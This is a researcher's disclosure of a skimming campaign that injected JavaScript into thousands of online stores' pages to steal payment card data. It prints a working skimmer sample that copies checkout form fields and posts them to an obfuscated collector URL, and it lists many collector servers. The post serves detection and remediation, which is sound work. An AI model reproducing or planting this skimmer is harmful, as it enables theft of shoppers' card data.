Widespread credit card hijacking discovered


Criminals have secretly rewired 3,500 online stores to continuously harvest credit card numbers. The fraud can be traced back as far as May 12th 2015, so if you have bought something at one of these stores in the last 6 months, your credit card is likely compromised.

I received reports of suspicious Javascript code through MageReport and have ran a scan on all known shops globally. To my horror, I discovered thousands of credit card hijacking shops.

There are multiple versions found in the wild, but they work the same. The malware is embedded in the header or footer of every page. Once an unsuspecting shopper submits a form that contains anything resembling a credit card number, the whole form is transparently copied, using AJAX, to a remote location.

This is a sample found in the wild (which sends credit card data to http://ownsafety.org/opp.php):

<script>// <![CDATA[
// whitespace added for readability --wdg
    function j(e) {
        var t = "; " + document.cookie,
            o = t.split("; " + e + "=");
        return 2 == o.length ? o.pop().split(";").shift() : void 0
    }
    j("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()), jQuery(function(e) {
        e("button").on("click", function() {
            var t = "",
                o = "post",
                n = window.location;
            if (new RegExp("onepage|checkout").test(n)) {
                for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++) if (c[i].value.length > 0) {
                        var a = c[i].name;
                        "" == a && (a = i), t += a + "=" + c[i].value + "&"
                    }
                if (t) {
                    var l = new RegExp("[0-9]{13,16}"),
                        u = new XMLHttpRequest;
                    u.open(o, e("
 
 
 
 
 
<br />
<div />").html("&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#111;&#119;&#110;&#115;&#97;&#102;&#101;&#116;&#121;&#46;&#111;&#114;&#103;&#47;&#111;&#112;&#112;&#46;&#112;&#104;&#112;").text(), !0), u.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + j("SESSIID")), console.clear()
                }
            }
        })
    });
// ]]></script>

I have found other collector servers as well, in order of frequency:

   1860 https://ownsafety.org/opp.php
    390 http://ownsafety.org/opp.php
    309 https://useagleslogistics.com/gates/jquery.php
    100 https://redwiggler.org/wp-content/themes/jquerys.php
     70 https://clickvisits.biz/xrc.php
     28 https://gamula.eu/jquery.php
     23 https://gamula.ru/order.php
     22 https://news-daily.me/gt/
     20 https://antaras.xyz/jquery.php
     17 https://clicksale.xyz/xrc.php
     10 https://ausfunken.com/service/css.php
      9 http://www.dobell.com/var/extendware/system/licenses/encoder/mage_ajax.php
      5 https://redwiggler.org/wp-content/themes/jquery.php
      1 /js/index.php
      1 /js/am/extensions/sitemap_api.php 
      1 https://infopromo.biz/lib/jquery.php
      1 https://google-adwords-website.biz/gates/jquery.php
      1 https://bandagesplus.com/order.php
      1 http://nearart.com/order.php
      1 http://happysocks.in/jquery.pl

Revolutionary malware

First, the malware went unnoticed for more than 6 months. It runs in the browser and is stored in the database of the CMS. This makes it hard to discover on a server level. Server measures like a periodic git status or a read-only filesystem will not help.

Second, with this new attack, credit card numbers are captured as soon as an unsuspecting shopper types them in their browser. Until now, credit card thieves mainly targeted (transaction) servers, where payment data is generally encrypted and thus hard to extract. With this new attack, credit cards are captured before they can be encrypted.

And finally, the high number of compromised stores implies extensive automation in discovery and exploitation. This is not the work of script kiddies.

Recommendations

I urge merchants and developers to verify the safety of their shop at MageReport, where we have added a specific check for Credit Card Hijacking and removal instructions. But please take a close look at the other results as well.

Meanwhile, I have asked the Dutch Cyber Security Center to take the collector servers down. Fixing all the stores involved will take a little longer, but Google will hopefully block these shops in the browser shortly.

Background: going back in time

To determine the first occurrence of this attack, the historical archives at scans.io are a great resource. The University of Michigan provides bi-weekly snapshots for HTTP frontpages for every IPv4 on the planet, going back two years. With some computing power and time, I parsed all the archives until no more traces of the malware could be found (code here). So the first malware was implemented between April 28th and May 12th. It gives interesting insights in its lifecycle, as the malware started by posting to its own address. Later on, likely because more shops were involved, the code switched to central reporting.

Yours truly: security consultant & researcher, tracking payment skimmers since 2015. I am also the founder of the opensource malware scanner and Magereport. If you could use an extra pair of eyes in your team to resolve a complicated security issue, do get in touch.